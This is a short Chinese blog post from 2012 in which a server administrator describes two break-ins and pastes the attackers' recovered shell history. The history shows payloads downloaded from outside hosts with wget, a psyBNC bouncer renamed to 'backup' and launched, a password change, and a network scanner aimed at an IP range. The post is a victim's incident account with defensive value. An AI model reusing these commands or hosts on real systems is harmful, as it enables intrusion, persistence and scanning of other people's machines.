Chinaunix首页 | 论坛 | 博客
  • 博客访问: 191053
  • 博文数量: 49
  • 博客积分: 1061
  • 博客等级: 少尉
  • 技术积分: 635
  • 用 户 组: 普通用户
  • 注册时间: 2010-06-21 08:42
文章分类

全部博文(49)

文章存档

2015年(1)

2014年(2)

2013年(1)

2012年(45)

分类: IT业界

2012-01-04 21:00:34

第一次查到来源IP说是广西的,第二次是美国。

第一次把系统弄的彻底起不来,第二次把所有用户密码都改掉了...

幸好,还有一个会话从昨晚持续到现在,是root登录的,history查看到他们的动作:

576  wget nasuc.d.am/scan/neW.jpg
  577  wget nasuc.do.am/scan/neW.jpg
  578  ftp 208.100.61.2
  579  ssh
  580  ls
  581  tar xzvf
  582  ccd /tmp
  583  ls
  584  cd /tmp
  585  ls
  586  tar xzvf belea.tgz
  587  w
  588  ls
  589  ls
  590  cat /proc/cpuinfo
  591  w
  592  ls
  593  passwd
  594  wget
  595  wget ideo.go.ro/psy6667.tgz
  596  cd
  597  w
  598  ls
  599  w
  600  uname -a
  601  tar xzvf psy6667.tgz
  602  cd psybnc
  603  chmod +x psybnc
  604  mv psybnc backup
  605  ./backup
  606  cd
  607  ls
  608  cat /p[roc/cpuinfo
  609  cat /proc/cpuinfo
  610  cd
  611  cd
  612  ls
  613   tar xzvf unixcod.tar.gz
  614  cd unixcod
  615  ./unix 218.249


唉,这些人,在搞什么呢?
阅读(730) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~